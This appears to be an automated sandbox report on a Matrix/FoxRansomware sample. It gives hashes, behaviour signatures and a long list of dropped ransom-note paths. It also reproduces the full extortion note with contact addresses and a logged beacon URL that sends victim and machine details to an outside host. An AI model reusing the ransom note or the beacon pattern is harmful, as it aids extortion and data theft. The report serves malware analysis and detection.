matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
13-02-2024 05:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Size

1.2MB
MD5

1fa1b6d4b3ed867c1d4baffc77417611
SHA1

afb5e385f9cc8910d7a970b6c32b8d79295579da
SHA256

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53
SHA512

0600b92914a7489a6428b8e4217e5f24e1d149fc5807d86cc4de91b43be2470a1ddf77093c8732d4371a87fd163cc556e09d11a2c6655382a35a5f5741ae05a5
SSDEEP

24576:K/SA+2lraRrjSJR5ezmT1dM9bBkNIDreFqO:2Xl9Ife

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#FOX_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 45AA0F52559CEC4B\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 45AA0F52559CEC4B\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 UCBxvlHp\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\All Users\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\th\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\be\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\Saved Games\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\Settings\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EVRGREEN\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\VideoLAN\VLC\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cy-GB\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f33\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ca-es\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\es-es\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\ProgramData\Microsoft\Diagnosis\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\1033\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Templates\1033\GettingStarted16\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\da\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\es\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nl-nl\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zu\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
HTTP URL	136	http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=ZHCNTALV\|Admin&sid=OOZVNLNk0Kq10FEB&phase=45AA0F52559CEC4B\|11826\|6GB
File created	C:\Program Files\Microsoft Office\root\Licenses\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jre-1.8\lib\management\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jre-1.8\lib\amd64\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

10064 bcdedit.exe
332 bcdedit.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

148 5264 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

HPTbJaR964.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS HPTbJaR964.exe

pid	process
10064	bcdedit.exe
332	bcdedit.exe

flow	pid	process
148	5264	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	HPTbJaR964.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

HPTbJaR964.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	HPTbJaR964.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wscript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation wscript.exe
Executes dropped EXE 3 IoCs

Processes:

NWqByALz.exeHPTbJaR9.exeHPTbJaR964.exe

pid process

3528 NWqByALz.exe
8860 HPTbJaR9.exe
6812 HPTbJaR964.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exe

pid process

10140 takeown.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	wscript.exe

pid	process
3528	NWqByALz.exe
8860	HPTbJaR9.exe
6812	HPTbJaR964.exe

pid	process
10140	takeown.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\HPTbJaR9.exe	upx
behavioral10/memory/8860-20177-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 30 IoCs

Processes:

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

description	ioc	process
